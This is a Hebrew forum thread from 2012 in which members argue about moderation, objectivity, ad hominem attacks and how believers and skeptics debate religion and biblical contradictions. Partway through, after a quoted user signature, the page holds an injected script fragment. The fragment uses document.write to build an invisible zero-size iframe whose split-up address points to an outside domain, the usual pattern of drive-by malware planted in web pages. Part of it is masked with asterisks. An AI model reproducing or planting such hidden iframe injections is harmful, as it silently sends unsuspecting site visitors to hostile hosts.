|
|
| נשלח ב-19/8/2012 23:49 |
|
| |
| אמשלום כתב: |  | [ואמאי,
כשיש לי מה להגיד, אני כותבת. אני מודה, שלא הכל מעניין אותי ויש אשכולות שאיני טורחת אפילו לרפרף בהם. תמיד היה כך. מבחינתי, כל עוד יש דיון ומפגש בין בעלי דעות שונות, הפורום ומנהליו ממלאים את תפקידם.
אתה מבקש מישהו שיכתיב קו מחשבה מסוים ועקבי - יש הרבה מקומות כאלה (אני מניחה שגם באינטרנט), ומה לך לחפש דווקא כאן?]
|
|
את נחשבת בעיני כבחורה פקחית, ותמיהני שאת מייחסת לי בקשה ל'הכתבת קו מחשבה מסויים ועקבי', לכן אני מניח שגם באשכול זה לא טרחת לרפרף, (אולי קראת את דברי נדב המעניינים, אם כי מה הקשר לדברי?), לא ביקשתי ממישהו שיכתיב קו מחשבה או דעה, אלא להיפך, מישהו שיכתיב קו דיון אובייקטיבי. אני גם לא ציפיתי או דרשתי, כפי שכתב ירוחם, אף אחד לא חייב לי כלום, ולנהל פורום זו עבודה קשה. רק הסברתי את הדינמיקה של הכחות, בפורום בלי מנהל מתנקז סוג מסויים של שיח. הסברתי את עצמי, כדי שלא יחשבו שאני בא להטיל דופי במישהו ספציפי, הסברתי שאני מטיל דופי במצב ספציפי.
פעם אמשלום כתבה שהניק שלה יותר נחמד ממנה, ואפשר להכיר שזה נכון [יש מין מרירות ממותקת כזו..], הכתיבה שלה מוציאה ממנה משהו טוב, וזה יפה מאד. אצל אחרים זה להיפך, אני בטוח שבחיים הם יותר נחמדים מהניק שלהם, כי לכאן מתנקזים הניג'וז ההסחה ודומיהם.
תוקן על ידי ואמאי ב- 19/08/2012 23:49:57
|
|
|
|
| נשלח ב-19/8/2012 23:51 |
|
| |
נדב
נפלא!
שרשרת איקונים ירוקים.
הדברים ראויים לציטוט בספר הזהב של הפורום.
וכיון שהזכרתי זאת:
ספר הזהב של הפורום נולד ברגע זה לפי הצעתי. הוא אמור להכיל ציטוטים נבחרים עם לינקים. ההודעה שלך צריכה להופיע בו.
השאלה היא איך לנהל אותו בלי שילך לאיבוד. פעם היו לנו אשכולות של מומלצים, אבל כיון ששיטת הכתובות משתנה אז אי אפשר להסתמך עליה. אז מה כן? אפשר להעתיק לאשכול הזהב ולעגן אותו, או לפחות שיזכרו אותו. אבל אז הוא לא יהיה ממויין.
לפני שאני פותח את "ספר הזהב של הפורום" כאשכול, האם יש הצעות איך לנהלו?
|
|
|
| נשלח ב-19/8/2012 23:55 |
|
| |
| מיימוני כתב: |  | ואמאי
אני מסכים לרוב מה שכתבת, ואף בא להוסיף על זה.
יש יחס לא שויוני בין שאלות ותשובות.
יש שאלות פשוטות שקשה מאד או בלתי אפשרי לענות עליהן.
ויש שהתשובות הן מסובכות מאד.
אני לא דיברתי דוקא על שאלות ותשובות, אלא על היגד חיובי, על איזו שהיא תיאוריה, רעיון, משהו מורכב שמישהו רוצה להגיד. אל מול הטרדה, נסיון לדחות את שיטתו הכללית / אמונתו / מגדרו / מגזרו וכדו' כשהדבר האחרון שמעניין הוא הנושא הספציפי המדובר
וכדי להסביר מדוע, צריך עוד פעם להתאמץ. להתאמץ ולכתוב, להתאמץ ולקרוא.
וזה כאשר הקוראים הם חכמים ונבונים ורוצים לדעת. ומה יהיה עם אלו שלוקים בהבנת הנקרא, או שקוראים ומדלגים, או שקוראים ונדמה להם שהכותב אמר מה שהם חושבים שאמר? (שימו לב: משפט מסובך! קל למשפט הזה לגרום בדיוק את התופעה שהוא מתאר).
ושוב, כל זה בלי שהדיון יוסב למקום חדש, לנושא חדש.
מה הפתרונות?
אין ממש פתרונות, אלא להשתתף, לתרום, להסביר, לגלות אורך רוח.
אורך רוח וזמן הם מצרכים יקרים, לך יש הרבה, לפחות מן האורך רוח, עובדה היא שלאחרים רבים וטובים כבר אין, למשל נדב שנרב.
כאשר מסבים את הדיון, לפתוח אשכול חדש מתפצל (אופטופיק) ולהעתיק לתוכו את הדיון המתפצל ולהישאר עם העיקר.
זה בדיוק מה שלא קורה כשצריך אותו.
כאשר לא מבינים, להסביר שוב.
כאשר לא מבינים, לחפש מה הן הנחות היסוד שיכולות להיות משותפות ולאפשר דיון פורה.
כאשר אין הסכמה, לסכם: זה מה שאני חושב, אלו הנחות היסוד שלי. האם הבנתי נכון שאלו הן הנחות היסוד שלך? זה המחיר שאני משלם. זה המחיר שאתה משלם.
יתכן שהתרומה העיקרית של הפורום היא הבהרה של הנחות יסוד. וכמובן, שותפות מרתקת וייחודית בין משתתפים ממקומות שונים לגמרי, שבכל זאת מסכימים לקבל עליהם את עול הדיון האינטלקטואלי תוך עירוב מינימלי של רגשות והנחות לא מודעות ולא מוכחות.
וזה הרבה מאד.
עובדה שלפני היות האינטרנט (והייד פארק) זה לא היה.
כמה חברים וירטואליים רכשתי כאן שאיתם אני יכול לשוחח על מה שלא אוכל לגלות לאף אחד מחברי ושכני במציאות האמיתית (האמיתית?).
לפורום יש תרומה גדולה מאד, אבל אני מדבר על הבעיה של חוסר היכולת להידברות, עובדה היא שזה פשוט לא קורה, מלבד החלפת וורטים, דיון משמעותי שנמשך בצורה מסודרת לא התרחש כאן בשנים האחרונות, חוץ מזה הכל אחלה
_________________ שומר פיו ולשונו - שומר מצרות נפשו
מת על החותמת שלך
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
 |
|
|
|
|
| נשלח ב-19/8/2012 23:56 |
|
| |
| מיימוני כתב: |  |
לפני שאני פותח את "ספר הזהב של הפורום" כאשכול, האם יש הצעות איך לנהלו?
|
|
כן, יש לי הצעה: שתנהל אותו!
|
|
|
|
| נשלח ב-20/8/2012 00:04 |
|
| |
ואמאי, זו היתממות בה' רבתי. נדיר שאתה מתייחס באובייקטיביות ולא במגמתיות לאיזה שהוא אשכול. אין מה לעשות, על מנת להתייחס ברצינות לאשכול, צריך לכל הפחות להחשיב את הצד השני כלגיטימי, ואתץ עמדתו כאפשרית. אתה - מעולם לא עושה זאת.
לי אין בעיה לשקול את שתי העמדות כשקולות ולנסות לדון בשתיהן, אתה מבקש לעשות זאת מתוך עמדת ייתרון והנחת המבוקש.
|
|
|
|
| נשלח ב-20/8/2012 00:14 |
|
| |
אתה צודק שמי שמאמין בכל לבו אינו יכול מבחינה רגשית להחשיב את הצד השני כלגיטימי ואילו מי שאינו מאמין יכול להיות באמת אדם שמסתפק ומתלבט אבל לענין הדיון המאמין יכול לדון באופן אובייקטיבי, לטעון טיעונים הגיונים ומספיקים, ולבטל טיעונים של חברו בנימוקים מספיקים. אפילו אם המאמין טועה והאמונה טעות, ייתכן שהמסתפק עוד יותר טועה, והוא שאל במקרה שאלה טפשית, או בהתאמה הוא שואל הרבה פעמים שאלות טפשיות. לפיכך עצם ציון העובדה שמישהו מאמין אינה אומרת כלום על אובייקטיביות טיעוניו והרי גם אתאיסטים אחרים (לא אתה חלילה) אינם חושבים באמת אפילו בצחוק לרגע שהזקן עם הזקן הלבן משחק בקוביות או שלא וכו'. ואעפ"כ ביכלתם להשתמש רק בטיעונים אובייקטיביים ולא בדעות קדומות. כך שאין שום עדיפות לצד זה או אחר. (מלבד העובדה הנכונה שבמקרה בעצכח נמצאים יותר מתלבטים המצדדים כרגע בכפירה, מאשר בעלי תשובה מתלבטים המצדדים כרגע באמונה וכדו', אם כי גם כאלו היו כאן). הנך יכול לטעון באופן אישי שאני כאדם ספציפי מתייחס שלא באובייקטיביות, זו כמובן זכותך, ואף מומלץ שתפתח אשכול בנושא. לטעמי אני משתדל להתייחס באוביקטיביות עד כמה שאפשר, תוך כדי שאני מכניס למשוואה ניתוח עתידי של הסיכוי שהאשכול ימשיך לזרום באובייקטיביות, ושיהיה ערך להיצמדותי לשדרתו. כמובן שלא תמיד אני מתאפק מלהעיר הערות בלתי עניניות, כמו כל קונפורמיסטי שזורם עןם סביבתו. לא באתי להאשים מישהו, אלא רק להצביע על הבעיה, שכפי שאמרתי סוחטת מאיתנו לא רק את החלקים הטובים.
 |
|
|
|
|
| נשלח ב-20/8/2012 00:15 |
|
| |
בכל אופן, מהנסיון, הרבה מתלבטים שבאמת לא החליטו, משתמשים בטיעונים לא אובייקטיביים, רגשיים, מבולבלים, מועתקים כתוכי, וההתלבטות לא יכולה להפוך את כל דבריהם לזכים, או להפוך אותם לחכמים יותר.
|
|
|
|
| נשלח ב-20/8/2012 00:57 |
|
| |
1. אפשר להשמע אובייקטיביים, רק אם לפחות באותו דיון, מתייחסים לשאלות בכובד ראש ומסתכלים על שני הצדדים באובייקטיביות. 2. אני לא אתאיסט (לפחות לא לעת אתה... :-) ). אני בהחלט חושב שייתכן שהדת אמיתית. אמנם נכון שרמת הטיעונים פה בעד, גורמת לי לפקפק באפשרות זו יותר ויותר. 3. אדרבא, ננסה לפתוח אשכול בו שתי הדעות יוכרו כשוות. אולי אתה מול ייתכן- אני אסכם. מסוגל?
אגב, מיימוני הבטיח פעם לעשות זאת, נראה כי במשך הזמן נתברר לו כי על מנת להגן על הדת הוא יאלץ לזנוח את הרציונאליות, ובזאת הוא נאלם - נעלם.
|
|
|
|
| נשלח ב-20/8/2012 04:31 |
|
| |
ואמאי
ברוך בואך אל העולם האמיתי!
הבנתי שמרגיז אותך שמפריכים לך היגדים חיוביים על ידי פרכות מכל מיני סוגים.
אז היגד חיובי שמסתמך על כמה הנחות, מספיקה פרכה אחת כדי להפריך אותו.
זה מה יש.
(אגב, בדומה לכך, כדי לטעון שיציאת מצרים הייתה לא מספיק למצוא אזכור של שם שדומה לשם יהודי בכתובת מצרית מזמן כלשהו, ועוד 17 אנקדוטות זניחות כאלו, ולהתעלם מכל הראיות הסותרות ומהתמונה הכללית, כפי שעושה דיקן האקדמי'ה הידועה. כתבתי 'בדומה' - כי כאן מדובר על מסקנה סבירה מנתונים שמוסקת בדרך של אינדוקצי'ה ומידת הסבירות היא פונקצי'ה של מספר הראיות, עוצמת כל אחת מהן, וסבירותו האפריורית של הטיעון, לעומת מסקנה מטיעון לוגי שבאמת מספיקה הפירכה הכי קטנה כדי להפוך את המסקנה לבלתי תקפה).
האמת לא נקבעת לפי הדציבלים של קריאות ה'שכייח' אחרי הווארט המייגע של סעודת שבת בבוקר, עם הרבה 'נפנופי ידיים' שמנסים (ולגבי חלק מהאנשים, גם מצליחים) להסתיר קפיצות לוגיות.
תמשיכו להתבחבש... משגע אותי שבלי שאבוא ואגיד את הדברים הפשוטים, יתחילו להתבחבש פה עד אינסוף.
נ.ב. זה אשכול המשך ל"צבי ינאי מטומטם או עושה את עצמו?"?
נ.ב.2. כל מה שתיארת פה זה בדיוק מה שאתה עושה בוויכוחים איתך, לפחות מנקודת מבטי.
נ.ב.3. הנה הצעת ייעול שלי בשבילך, 'ואמאי', וכל שום וחניכה דאית לי'ה: תתחיל לכתוב משפטים קצרים ולהפסיק ביניהם בעזרת הסמל האורתוגרפי "." (בעברית נקודה). המשפטים הארוכים שלך עם הפסיקים הם גם מייגעים, וגם חושדני שמטרתם לנסות לחפות בנפנופי ידיים קפיצות לוגיות והעדר אמירה (אולי גם לחפות כלפי עצמך).
ביוש בינתיים
תוקן על ידי רציוסקפטי ב- 20/08/2012 04:31:49
 |
|
|
|
|
| נשלח ב-20/8/2012 04:41 |
|
| |
שנרב חשף (בצורה מאד מרשימה) משהו מהותי בדיוני הפורום - הם מוטי דעה ומגמתיים. נכון שרוב ויכוחינו מוטי דעה, (וגם לכן אפשר פחות להלל את הרציונליזציה, כי הדעה הולכת אחר הרצון ולא להפך, אז אולי נכון יותר לחקור את הרצון להיות בעל דעה כזו או כזו, את האילוץ, את ההכרח, את הרווח, את הנטיה, וכו') אבל יש בזה רמות שונות, וכאן הם לגמרי מוטי דעה. למשל, מופיע דיון על לכאורה סתירה מקראית בענין המקושש? אנחנו מרגישים\רוצים תוצאה מסויימת (שהסתירה ניתנת\לא ניתנת לישוב), ואז מתחילים להריץ דעות שתשרתנה את רצוננו או צרכינו. אם נבדוק את תהליך מחשבתנו בכנות, נראה שכך הוא. אז אולי, אולי יש מקום לדון פחות על הפרטים ויותר על הרצונות והצרכים שלנו באמיתות\אי אמיתות הדת, כי הם אלו שבעצם מובילים פה את הדיונים ברמת הסבטקסט. (וכך קורות תופעות מוזרות, למשל - שתוך כדי הצדקת הדת אנשים מוכנים להתייחס לתורה כאל עתון יומי, כאל ספר אגדות, כאל ספר הסטוריה מפוקפק, אל יוצריה כאל בעלי מוגבלויות אנושיות רבות, אל דמויות {ומעשי} המופת שבה כאל אנשים מעשיהם הנשגבים היו טעות, וזה בעיני זלזול בה הרבה יותר מהסתירה ומהכפילות שאולי יש בה ולא יתורצו.מה ששנרב אמר על איוב, זה מה שטענתי אתמול באשכול ים סוף. שעדיף שאלה ללא תשובה, שקדה בצניעות הבנת מוגבלות האנוש מול הבנתו ועמקותו האינסופית של הבורא, מתשובה מצדיקה בעיקום ובהטיה לא סבירים.) או שאולי, נשתדל לקחת דיון אחד 'נקי' למען ההגינות הפנימית. ייוצג נושא לדיון, ונשתדל כולנו בדיון הספציפי הזה לבוא אליו נקיים במידת האפשר. בלי רצון מוקדם, בלי צורך מוקדם, בלי הנחות יסוד, בלי מגמה. לראות את הנושא כאילו נולדנו היום עם כלי החשיבה שלנו ואנו מתבוננים בו, ככל האפשר בנקיות, ונראה מה יקרה. תהיה איזו הצהרה בראשית הדיון שבה נצהיר כי אנו 'פושטים' לשעה קלה את המגמה, הנחות המוקדמות, הרצון והצורך בעניני הדת. אני מסופקת אם דבר כזה בכלל אפשרי.
 |
|
|
|
|
|
| נשלח ב-20/8/2012 07:21 |
|
| |
מה שאני רואה פחות או יותר באשכול זה, הוא שכל אחד רוצה דיון שיתנהל לפי ההנחות שלו או בדרך שהוא חושב שדיון אמור להתנהל. ומתוסכל שיש אנשים אחרים בעולם שאינם חושבים כמוהו וממילא מאשים אותם בדיון לא עניני.
לכאורה, מנקודת המבט שלי, הרי זה בדיוק מה שאנו מחפשים פה. מקום שלא ידבר רק בקול אחד אלא שכל אחד יוכל לבטא את דעתו. ושקורא מן הצד יוכל לראות מוצגות לפניו כמה דרכים ופנים שונים לאותו ענין.
חשוב להבין, כשם שאין דעותיהם שוות לגבי המסקנות. כך אין דעותיהם שוות באופן הדיון הרצוי. לכן דיאולוג חוצה גבולות אמיתי צריך ללמוד להתמודד גם עם זה שאנחנו לא באמת מדברים תמיד באותו שפה. ואדרבה, זהו היופי, שניתן לדבר על אותו ענין מכל מיני צדדים ושפות ולקבל צורות אחרות לגמרי לגשת לנושאים. לדעתי זה הדבר העיקרי שאפשר ללמוד מהשתתפות בדיונים כאלה.
[ויש לעיין עד כמה באמת יש מחלוקת בדעות הסופיות כלל ואולי כל המחלוקות אינם נובעים אלא מצורות גישה אחרות לנושאים.]
צריך רק להצביע על כמה תנאים שנצרכים כדי לקיים דיאולוג נכון.
א' -הוא שהדיון יתנהל בהנחה כלשהו שהשניים מבינים אחד את השני. כפי שאני רואה בדיונים רבים כאן שני הצדדים פשוט מניחים כל הזמן שהצד השני לא באמת מבין מה שהוא אומר או את הצד שלו. גם אילו זה צודק לפעמים, אין כל טעם שיהיה דבר זה במודעות בשעת דיון. מי שנראה לך שהוא לא מבין, אל תדבר אתו. אם אתה מדבר איתי, אתה חייב להיות כל הזמן בהנחה שאני מבין את טענתך וחולק עליך. לא שאני פשוט לא רואה את מה שאתה רואה. רק כך אפשר שיהיה ויכוח כלל.
ב' -לקבל שאין שום ענין ואפשרות לגרום שהשני יודה לך, או אפילו שתטען טענה שיהרוס את הטיעון שלו לגמרי. אנחנו רואים אפילו בדיונים שבהם אחד הצדדים פשוט טעה בפרט מסויים הניתן לבירור, ומוכן להודות בכך. הוא לא מוכן להודות שהוא טעה בכלל טענתו, ובד"כ הוא צודק. אף אחד מעולם לא הודה כאן לצד שני בויכוח, ואינו צריך להודות. בכלל, לשנות את דעתך בגלל שקראת משהו באינטרנט לא נראה לי מעשה של בר דעת. שני הצדדים צריכים לקבל ולהיות מודע לזה כל הזמן. הכי טוב שאנחנו יכולים לעשות זה להתווכח ולהציג את הדעות שלנו עד כמה שאפשר בדעת ולא בטיפשות. ולנסות לשקול לשפץ ולדייק יותר בצד שלנו. בקיצור, לחלוק בהגינות, בענייניות.
ג' לימנע מכל מילה של אד הומינום וכל חשש דחשש שלו. לא כי זה לא צודק. אדרבה, מסתמא על פי רוב דעותינו אינם נובעות ישר מהפעלת ההגיון הטהור, כמו שלומדת טוענת מעלי. אלא כי אין שום טעם בדיון כזה. ודרכו של אשכול שברגע שמישהו רק כותב מילה לא עניינית שכבר אין סיכוי שיהיה שום התקדמות על ידי האשכול ההיא. ולכן צריך לברוח כמה שאפשר, סחור סחור אמרינן לנזירא, בלי שום תירוצים. אפשר לנסות לקיים דיון עניני בשאלה האם אנחנו מחליטים על פי השכל או על פי הרגש והנגיעות, וכבר היו אשכולות על זה, אבל אסור בתכלית האיסור לקשר את זה או להעלות את הטענה הזו בשום דיון פרטי. ----
ישנו חסרון קצת מובנה בפורום כזה, לפחות איך שהוא מתנהל כיום, והוא שהוא זמני. כל הבירורים שבו קיימים רק בציר הזמן, ואין מחשבה של כתיבת דבר לנצח שיתברר עוד ועוד בהמשך הזמנים. [אולי בראשית ימי הפורום היה קת יותר כך] שהוא בעצם ההגדרה היסודית של המילה הכתובה- שאינו קיים במרחב הזמן. טבעו של אדם שהתקדמות, בפרט התקדמות שכלית עמוקה ולא שטחית, דורשת זמן רב. גם טענה שהיא םשוטה ונכונה, כשהוא שונה מהרגיל, ודורש שינוי רב בהשקפת עולם ובמחשבה. דורש זמן לעיכול וקבלה והתאמה על כל שאר המערכות שהאדם חי בהם. לכן יש להתייחס לפורום הזה יותר כמו אל שיחה ולימוד משותף בעל פה, ולא להתיחס לזה שהוא מתקיים במדיום כתוב. [זו אגב בעיה שיש בכל האינטרנט] אםשר להמליץ שכל אחד ירשום לו בעצם המסקנות היוצאות לו מהדיונים כאן, וינסה להוציא מה שהוא מוציא מכאן שלא על ציר הזמן, ולגבש ולסדר לו את עמדותיו ומחשבותיו בנפרד. הכתיבה כאן אינו אלא שיחה בין חברים המשוחחים על הדברים שהם חושבים עליהם ומעסיקים אותם. ואין לצפות ממנו ליותר משיש לצפות משיחה בשטיבל, ואולי במובנים מסויימים יש לצפות לפחות, שכן חסר המימד האישי שבפגישה.
--- סוף דבר, גם את ההערות האלו שלי אני מכניס לכאן בתור דיאולוג רב משתתפים. ואני מנסה להיות מודע לכך שישנם אנשים שונים שהסתכלותם וגישתם לנושא שונה בתכלית. אנחנו רואים כל הזמן שמישהו כותב משהו וכל מגיב פשוט רואה שם משהו אחר לגמרי. וזה היופי של מקום כזה.
 |
|
|
|
|
| נשלח ב-20/8/2012 07:26 |
|
| |
[ואמאי,
לא רפרפתי. קראתי. רק להזכירך, זה מה שביקשת - "אם למשל היה כאן מנהל, אפילו אם היתה לו אוריינטציה ספציפית, כגון שהוא תומך בביקורת המקרא ובאתאיזם וניהיליזם, הוא היה אמנם יכול להקשות על מי שמתנגד לרעיון, אבל הדיון היה ממוקד, ולכן היה מיקל על מי שבאמת היה לו משהו להגיד מעבר ללהמציא את הגלגל. " (חיפשתי ציטוט של משפט או שניים, כדי להציג את מיקוד דבריך, ואני מודה שהתקשיתי ביותר. זה הקרוב ביותר שמצאתי...)
אתה לא מחפש "מנהל אובייקטיבי", אתה מחפש פשוט "מנהל", שבעיניך זה מישהו שדמותו החזקה תהיה נוכחת ברחבי הדיוני בפורום. מישהו שהניק שלו יופיע בכל דיון ודיון. מישהו שיביע את דעתו התקיפה וייתן תחושה שאכפת לו מן הכותבים הראויים ושהוא כועס על אלה שאינם ראויים. מישהו שיש לו הכוח לסדר את הדברים והוא ידגים זאת מפעם לפעם. מישהו שכדאי להתחשב בדעתו (לפחות לגבי האופן בו מתנהל הדיון, אם לא לגבי מה שנאמר בו). בקיצור, אתה מחפש א-להים בנגלה (או איזה "דון" איטלקי...). אני משתתפת בצערך, על כך שלא תמצא זאת כאן (וגם לא בעולם המציאותי, אבל זו כבר באמת לא בעיה שלי). אני פשוט לא מבינה מדוע אתה מתעקש להמשיך ולחפש זאת כאן - תבניתו של הפורום הזה לא השתנתה כבר שנים ארוכות. כותבים באו והלכו, אחרים נשארו, למדו והתפתחו - כל אחד בדרכו. משהו כאן כנראה עובד. קצת כמו בעולם המציאותי...]
 |
|
|
|
|
| נשלח ב-20/8/2012 07:34 |
|
| |
לומדת
לא תמיד זה שאנו הולכים לפי ההנחות הראשוניות שלך, זהו הטייה. אדרבה, זהו הדרך הכי שכלית ורציונלית להתייחס לדברים, לנסות להתאים אותם אל ההנחות הראשונות שלנו. כאשר תראי שמישהו הכניס שלשה תפוחים ועוד אחד לשק ובסוף את מוצאת שם חמש, לא תתחילי כעת לחשוב בנקיות שהכלל שלימדו אותך ששלש ועוש אחד הם ארבע הוא מוטעה, אלא תחפשי איפה הוא רימה אותך והכניס עוד תפוח. ולכן, מה שצריך לעשות רציונלית זה להצמד להנחות היסודיות שלנו, ולנסות להסביר לפיהם את התופעות. רק כאשר יש מסה קריטית של שאלות אנחנו מחוייבים לזנוח את ההנחות שלנו ולבנות חדשות תחתיהם.
אותו דבר כאשר נתקל בסתירה במקרא. אם ההנחה הכוללת שלי זה שאין סתירות, אחפש איפה ניתן ליישב אותם. אם ההנחה שלי שהתשובה חייבת להיות מושלמת ואלקית, אחפש יישוב על שמתאים לדרך זה. אם אני מניח שעל דרך הפשט אפשר להבין את התורה בדיוק כפי שאנו מבינים כל טקסט חילוני, אסתפק גם ביישוב שכזה. אם ההנחה שלי שיש תעודות ומקורות שונים, אסביר לפי זה. בכל זה אין שום הטייה אלא פעולה רציונלית לגמרי שבו אנחנו מנסים להסביר דברים לפי הנחות היסוד שלנו. הויכוח המתנהל אודות המקרא הוא רק אם אמנם ישנם מספיק ראיות שיגרמו לצד אחד לזנוח את ההנחות הראשונות שלהם. וגם זה ויכוח רציונלי לגמרי ללא כל קשר להטייה. [אע"פ שיש כאלה שטוענים שיש הטיות משני הצדדים, עדיין יש כאן שני צדדים שכליים לגמרי.] אם מישהו מכח הקושיא בא למסקנא שאינו מתאים עם הנחה אחרת שלו, ומחליט שהקושיא הזו חזקה יותר מאשר ההנחה ההיא, אבל לא יותר חזקה מההנחה שעליו הקשה, הרי שיזנח את ההנחה הנראית לו פחות מסתברת.
לכן, למשל מישהו מי שחשב שכל מילה בתורה אלקית וכו', ומכח הסתירות החליט שאפשר להתייחס אליו כמו אל היסטוריה רגילה וכדו', גם הוא עשה פעולה רציונלית לגמרי. ואין כאן כל דוחק או הטייה. מי שההנחה וההתייחסות שכל מילה אלקית יותר חשוב לו, ישאיר את ההנחה הזו ויצטרך ליישב בדרך אחרת. [כמו את שטוענת שיש קושיא ובאמת אין מבינים. [אגב, אני לא מבין כלל את הסתירה הזו. ההתייחסות המרוממת לתורה היא צורת ההתייחסות שלנו שלה אכן ישנם סיבות סובייקטיביות ואין כל חולק על כך. וזה לא אומר כלום לגבי איך נלמד אותה. אפשר לקרוא את החומש בקרירות כאילו היו עלילות גלגמש, ומיד אחרי זה להגיד דרשה נלהבת על קדושת כל אות שבתורה שעל ידה נוצרו עולמות וכו' וכו'. איני רואה כל סתירה בין שני הדברים האלה, דווקא מפני שההתייחסות סובייקטיבית ואילו הלימוד מנסה לפחות להיות אובייקטיבי. איני יודע למה את מערבת בין שני הדברים האלה כל הזמן.]
תוקן על ידי יהיאור ב- 20/08/2012 07:36:20
תוקן על ידי יהיאור ב- 20/08/2012 08:11:51
 |
|
|
|
|
| נשלח ב-20/8/2012 08:12 |
|
| |
רציוס' ולומדת
הרשו לי לא להסכים עמכם.
ואמאי תיאר מצב אחד, אתם אחר.
אני חוזר על דבריו בקיצור כדי להראות מדוע.
רציוס' תיאר תגובות שאכן אינן ראויות להופיע בפורום שלנו. לא ווארטים (שהם, עד כמה שאני מכיר, דרשות שיש בהן במקרה הטוב רעיון אבל לא פשט) ולא דילוגים מנושא לנושא ללא הוכחה.
ואמאי תיאר דיון שאמור להוות הוכחה, או לפחות מבנה שיש בו לעורר מחשבה.
זה שכל מבנה עומד על הנחות יסוד, ובהעדרן הוא נחלש, והמסקנה מאבדת את תוקפה (אבל זה עדיין לא הופכת אותה לשקרית. כאשר טיעון לא תקף אין זה אומר שהמסקנה לא נכונה, רק שלא הוכחה) - זה נכון וברור. אבל לא זה מה שתיאר ואמאי.
ואמאי תיאר הסחות דעת. היתפסות למה שלא שייך או מה שהוא צדדי.
מן הראוי לציין דוגמאות אבל אין לי כאלו מן הזמן האחרון.
יותר מכך, רציוס' יקירי, קרא נא מה שכתבת. היודע אתה כי מדבריך אני חש, סליחה, ממש עוינות. אני מכיר תחושת עוינות משלי נגד אלו שמזייפים ומטעים בשם היהדות והאמת. נגד אלו שבעיני אינם מדייקים. אבל אם מדובר בחברים חיים בפורום אני משתדל לפנות אליהם בכבוד, בהערכה, להזמין אותם לדיון שבו נבחן יחד את הנחות היסוד שלנו. אני משתדל מאד להקפיד שלא להשתמש בביטויי גנאי, במלים גסות או חריפות. הרי זה הסיכוי היחיד להראות שמישהו טועה. מדוע בדבריך אפשר לחוש משהו אחר?
שים לב שאני כותב לך תוכחה ברבים, ואין זה ראוי כל כך, אבל אני מקוה שתמחל לי על זה.
הנה בעצם דוגמא. טענת נגד ואמאי שיש לו משפטים ארוכים עם פסיקים במקום חלוקה למשפטים קצרים על ידי נקודות. אני מבין שלמדת בעולם הישיבות אז אין צורת ההתבטאות הזו זרה לך. אני מסכים שהיא מקשה על ההבנה ומצריכה ריכוז ולפעמים קריאה חוזרת. אני עצמי מבכר משפטים קצרים המצטרפים יחד. אבל כל עוד אדם מציג טיעון מסודר, גם אם לא בצורה הכי קריאה, האם יש להביע נגדו התנגדות? אולי הוא אנוס בדבר? לא כולנו יודעים להתבטא בקלות. הרוצה לערער על הרצף, יטרח, יפרק אותו לטענות בודדות, וידון בכל אחת בנפרד.
אם מטרתנו היא לברר את האמת, אין אנו עוסקים בהטחת עלבונות אלא בבירור אמונות והנחות יסוד. לא באישיות של האדם אלא במה שהוא אומר. וראוי לנו, לדעתי, להשתדל לסייע לאדם להציג את עמדתו ורק לאחר שזה נעשה בצורה מיטבית (ברורה, מסודרת) לדון בה.
על זה לדעתי עומד הפורום וצריך לעמוד הפורום.
*** לומדת
אני חש בהבדל בין מה שכתב נדב לבין מה שאת כתבת.
אם הבנתי אותך, את רואה הטיה בכך שמזלזלים בתורה במובן שמחשיבים אותה ליצירה אנושית (או האם גם ליצירה אנושית?) ואת הדמויות החשובות שבה לבני אדם כושלים או לפחות רגילים. אבל כמדומה שנדב בא לטעון בדיוק את זה: שאל לנו למהר לכפות את הנחות היסוד שלנו לגביהם כאשר מנסים לפרש את הנאמר בתורה. מותר לנו (וראוי לנו) לבדוק אם הפרשנות שלנו מוצדקת. אבל שלילה מראש של משמעות מסויימת לתורה, בין כיצירה אלוקית, בין כיצירה אנושית, היא היא הטיה בכך שהיא מסרבת לבדוק אפשרויות. והפורום אמור לסייע לבצע את התפקיד ההפוך. לבדוק. או למצער להיות ער להנחות יסוד.
אדרבה, עלינו להבדיל בין מה שאנו מאמינים או יודעים שהוא אמת לבין הדיון בו אם הוא נכון ומדוע. התעלמות מהבדלה כזו היא היא ההטיה הפסולה שעליה דיבר נדב. אם הבנתיו.
ושוב אני מנסה לנסח במלים קצת שונות: אני יכול להאמין בכל מאודי באמונות היסוד שלי. אבל אני גם יודע שיכולתי להעביר אמונות אלו לאחרים תלויה בכך שאציג אותן כטיעונים מסודרים. כל ציפיה אחרת היא הטיה.
*** [אלי ס
קראתי את דבריך והבנתי מהם שיש לך טענה עלי שלא המשכתי לדון איתך באשכולות על הוכחה ורציונליות. פעמים שהבטחתי לדון איתך ועם ייתכן ולא קיימתי מפאת חוסר הזמן. אולם בפעם האחרונה שניהלנו דיון, גיליתי חוסר הצלחה משווע מצידי לסכם על הנחות יסוד שיטתיות ואפילו גיליתי שאנו משתמשים במילים ראשוניות לדיון (הוכחה למשל) באופן שונה. אמנם עשית דבר יפה מאד ופתחת אשכול על השימוש במילים כמו "הוכחה" אבל שם באמת לא היה לי זמן להגיב. וגם פחדתי שלמרות שאנו מתחילים בדיון כזה, שהוא חשוב מאד, איכשהו יווצרו סתירות בהמשך ולא אדע להסביר אותן כיאות באופן שייכנס לאוזניך ולליבך.
בכל אופן, אני ממליץ שלא תדחה טענה או אמונה בגלל שאין מי שיודע לייצג אותה היטב].
|
|
|
|
| נשלח ב-20/8/2012 08:20 |
|
| |
אמשלום
אני מצטרף דווקא ל-ואמאי בתשוקתו למנהל ולניהול.
יש בהחלט תופעות של הסחת דעת, התפצלות לנושאים אחרים, התייחסות אד הומינם (אפילו באשכול זה!).
התפצלות לנושא אחר מזקיקה בריאה של אשכול חדש.
התייחסות אד הומינם ראויה למחיקה.
הסחת דעת, איני יודע מה לעשות איתה. צריך להסביר למה היא הסחת דעת וזה עצמו מסיח את הדעת. ולא להתייחס זה להשאיר תחושה שהתעלמו ממשהו שאולי הוא חשוב. זו הבעיה הכי גדולה כי איני רואה לה פתרון.
בכל אופן, מנהל מסור ובעל זמן רב מאד שלא לומר אינסופי היה נכנס לכל אשכול, בודק כל תגובה, ומוחק מה שלא ראוי ומעביר דיונים למקום אחר אם צריך.
רק שזה לא אפשרי. אבל זה לא פוסל שיתגעגעו לזה.
